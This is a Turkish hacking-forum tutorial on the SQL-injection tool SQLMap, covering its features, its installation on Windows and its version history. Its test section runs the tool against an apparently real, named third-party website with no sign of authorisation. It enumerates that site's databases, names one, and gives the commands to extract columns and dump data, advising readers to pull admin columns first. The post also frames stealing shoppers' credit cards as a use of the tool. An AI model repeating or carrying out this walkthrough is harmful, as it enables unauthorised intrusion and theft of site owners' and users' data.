http://www.turkhackteam.org/web-server-guvenligi/1171138-sqlmapi-tor-ile-kullan.html
Üstadın da bahsettiği gibi bu konunun çok çok çok daha derin parametreleri var. Bahsettiğiniz parametreler bile tam değil hatta, diğer yazınızda satır satır inceleyip eksiksiz yazmanız dileğiyle
eline sağlık hocamKonu SolidStar ve Quiklav'ın ortak çalışması sonucu hazırlanmıştır.
1- SQLMap Nedir?
SQLmap, Veritabanı'ndaki Otomatik Enjeksiyon işlemini gerçekleştirmek ve bunlardan veritabanına sızıp veri almaya çalışmak için kullanılan, açık kaynaklı bir SQL Enjeksiyon aracıdır.Hackerlar ve Pentesterlar arasında oldukça yaygın olan SQLMap, çeşitli amaçlarla kullanılmaktadır.Hackerlar genelde web sistemlerine ve kullanıcılara zarar vermek için kullanırken, Pentesterlar açık taraması ve güvenlik kontrolü için kullanmaktadır.
Günümüzde çoğunlukla, internetten alışveriş yapılmaktadır. SQLMap ile hackerlar, internetten alışveriş yapan insanların kredi kartlarını hedef alabilirler.
SQLMap, güvenlik açıklarını eşleştirmenin ve bulmanın yanı sıra, kullanıcıların, parolaların, yedeklerin, telefon numaralarının, e-posta adreslerinin, kredi kartlarının ve diğer gizli ve hassas bilgiler gibi tablolardaki verilerin düzenlenmesini silinmesini sağlar ve veritabanına erişime izin verir.
2- Desteklenen Platformlar
SQLMap komut satırı üzerinden çalıştırılır ve farklı işletim sistemleri için indirilebilir. Linux, Windows ve Mac OS işletim sistemleri.
3- Kullanım Alanları ve Genel Kullanım Şekilleri
[COLOR="#90b90"]SQLMap, MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird ve SAP MaxDB gibi birden çok veritabanı için tam destek sağlar.
Ayrıca SQLMap , Boolean, Error, Stuck, Time, Union enjeksiyon türlerinde tam destek vermektedir.
Yazılımın Unix ortamında standart kullanımı aşağıdaki gibidir:sqlmap -u "http://172.16.0.0/files/file.php?id=1"
Ek olarak çeşitli değerler kombine edilebilir:
--dbs: veritabanlarını görüntüler.
--tables: veritabanında tablolar görüntüler.
--columns: Veritabanında sütunlar görüntülenir.
--dump: DBMS veritabanı girişlerini dökecektir.
Yardım dosyasını görüntülemek için aşağıdaki komut da girilebilir :
sqlmap -h
[/COLOR]
4- KURULUM VE TEST
4.1 Kurulum
4.1.1 Pyhton kurulumu
[COLOR="3AA49"]Öncelikle pyhton kurmamız gerekiyor, ama çalıştırmak için sürümü 2.6x ve 2.7x arası olması gerekiyor. Çünkü diğer sürümleri sqlmap'e uymuyor.
Diyelim ki başka bir sürüm kurduk, peki ne olur? [/COLOR]
[COLOR="#a0fe0"]Kod:[CRITICAL] incompatible Python version detected ('3.6.4'). To successfully run sqlmap you'll have to use version 2.6.x or 2.7.x (visit 'https://www.python.org/downloads/')
Şeklinde hata verir.
Python 2.7.0 Release
linkinden indirelim, tabi ben windows'ta göstereceğim için windows olanı indiriyorum.
Kurulumu başlatalım,
Install for all users dediğinizde bilgisayarınızdaki farklı bir oturum açtığınız hesap(lar) varsa, onlarada pyhton 2.7 sürümünü kurar.
Install just for me dediğinizde ise sadece kurulumda kullandığınız hesaba 2.7 sürümünü kurar.
Bu bölümde direk next ile kurulumda ilerler iseniz c: dizinine kurar, siz c: dizinine kurmasını istemiyorsanız burdan değiştirebilirsiniz.
Burda yüklenecek paketleri görüyorsunuz, istemediğiniz bir paket varsa onun yüklenmesini iptal edebilirsiniz.[/COLOR]
Disk Usage butonuna basarsnız disk kullanımına bakabilirsiniz.
İlerle dedikten daha sonra kurmaya başlayacak, dosyaları yükledikten sonra finish butonuna basıp kurulumu bitiriyoruz.
4.1.2 Sqlmap kurulumu
Şimdi sqlmap kurulumuna geçiyoruz.
İndirme linkleri:
Windows için .zip uzantılı olarak indirmek için tıklayınız.
GNU için .tar.gz uzantılı olarak indirmek için tıklayınız.
İnen zip dosyasının içinden dosyayı çıkartıp c: dizinine atıyoruz.
Dosya ismini kolaylık için "sqlmap" değiştirebilirsiniz, aksi hâlde cmd ile o dizine girerken "sqlmapproject-sqlmap-5ff54bf" olarak yazmanız gerekecek.
Sqlmap'i kurmuş olduk, kurulumu buraya kadardır.
4.2 Test
4.2.1 SQLMap başlatımı
komut istemini(cmd) açıyoruz, ilk önce c: dizinine gelmemiz gerekiyor.
Kod:Cd..
yazarak bulunduğumuz dizinden çıkıyoruz, daha sonra tekrar yazarak c: dizinine gelmiş oluyoruz.
Kod:Cd..
Kod:Cd sqlmap
yazarak sqlmap dizinine geliyoruz,
Ve böylece sqlmap'i çalıştırmış olduk.
4.2.2 Site veritabanı çekilimi
Şimdi bir siteye sızmayı deneyelim.
Kod:sqlmap.py -u https://sqlmapdenemesitesi.com/acikbulunantaraf?id= --dbs
Daha açık söyliyeyim ben site buldum hangi bölümünde açık varsa o bölümünün linkini aldım.
Kod:sqlmap.py -u http://www.f10products.co.za/index.php?id=5 --dbs
Gördüğünüz gibi 2 tane veritabanına ulaştık,
Kod:sqlmap.py -u http://www.sqlmapdenemesitesi.com/acikbulunantaraf?id= -D Tablo-Adı --columns
Yani
Kod:sqlmap.py -u http://www.f10products.co.za/index.php?id=5 -D healts_db2 --columns
Kolonları çektik, şimdi içindeki verileri çekelim.
Kod:sqlmap.py -u http://www.sqlmapdenemesitesi.com/acikbulunantaraf?id= -D Tablo-Adı -C Kolon-Adı --dump
Kolon adında admin vb. yazıyorsa ilk onları çekin.
Daha sonra ise çekilen datalar geliyor.
Ve site veritabanını çekmiş olduk.
5- Özellikleri
-DBMS kimlik bilgilerini, IP adresini, portu ve veritabanı adını sağlayarak doğrudan bir SQL enjeksiyonu olmadan veritabanı ile bağlantı sağlamak için destek.
-Kullanıcıları, hashleri, yönetici ayrıcalıklarını, veritabanlarını, tablolarını ve sütunlarını numaralandırmak için destek.
-Parola biçimlerinin otomatik olarak tanınması ve bunları sözlük tabanlı bir saldırı ile (BruteForce) kırma desteği.
- Veritabanı tablolarını ve bilgilerini tamamen çekme desteği.
-MySQL, PostgreSQL veya Microsoft SQL Server'da dosya sisteminin altında yatan veritabanı sunucusundan herhangi bir dosyayı indirip yüklemek için gerekli destek.
6- SQLMap'in Tarihi
[COLOR="#0FCFF"]
- SQLMap ilk olarak 25 Temmuz 2006 yılında SourceForge üzerinden geliştirildi. Temel versiyonunda MySQL için kısıtlı bir destek mevcuttu.
- Ağustos 2006'da PostgreSQL'e destek eklendi ve sürüm 0.1 yayınlandı.
- 13 Aralık 2006'da DBMS için geliştirmeler yapıldı ve 0.2 sürümü yayınlandı.
- 20 Ocak 2007'de Microsoft SQL Server için ilk destek eklendi ve 0.3 sürümü yayınlandı.
- 15 Haziran 2007'de DBMS için altyapı iyileştirmeleri yapıldı ve veritabanı sunucusundan belirli verileri numaralandırma eklenerek sürüm 0.4 yayınlandı.
- Ocak 2008'de SQLMap , SourceForge'dan ayrıldı ve bir süre boyunca özel geliştirildi.
- 1 Eylül 2008'de Debian ve Windows için özel geliştirmelerin sunulduğu 0.6 sürümü yayınlandı.
- 2 Kasım 2008'de hata düzeltmelerinin uygulandığı sürüm 0.6.2 yayınlandı.
- 18 Aralık 2008'de SQLMap, WebScarab proxy desteği ile 0.6.3 sürümüne güncellendi.
- 3 Şubat 2009'da 0.6 alt tabanının son sürümü olan 0.6.4 yayınlandı. Bu sürümle birlikte hız açısından denge sağlanmış ve çeşitli hatalar giderilmiştir.
- 22 Nisan 2009'da Me-t-a-sploit ile tam entegrasyon desteğine sahip, Microsoft Security Bulletin MS09-004 için Microsoft SQL Server 2000 ve 2005'e uygun olan sürüm 0.7'nin önizlemesi geliştirildi.
- 25 Temmuz 2009'da SQLMap 0.7'nin kararlı sürümü geliştirildi.
- 18 Aralık 2009'da 0.8 sürümünün önizlemesi aktif olarak geliştirilmeye başlandı.
- Mart 2010'da SQLMap demo videoları yayınlanmaya başlandı.
- 14 Mart 2010'da birçok yeni özelliğin sunulduğu SQLMap'in 0.8 kararlı sürümü yayınlandı. Bu özelliklerin arasında veritabanlarındaki tüm tabloları listelemek ve Me-t-a-sploit 3.3.3 ile tam entegrasyon mevcuttu.
- Aralık 2010'da SQLMap'in 0.9 sürümünün kararsız versiyonu geliştirildi.
- 10 Nisan 2011'de yeniden yazılmış güçlü bir SQL Enjeksiyon algılama motoru, doğrudan veritabanı sunucusuna bağlanma imkanı, zamana dayalı SQL Enjeksiyonu ve hata tabanlı SQL Enjeksiyon desteği sağlayan 0.9 sürümünün kararlı versiyonu geliştirildi.
- 27 Şubat 2016'da 1.0 stabil versiyonu yayınlandı.
- 2 Ocak 2017'de 1.1 stabil versiyonu yayınlandı. Bu versiyonda çeşitli hata düzeltmeleri mevcuttu.
[/COLOR]
Kurulum ve Test(4) : Quiklav
Anlatım ve İngilizce Aslından Çeviri(1,2,3,5,6) : SolidStar
Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.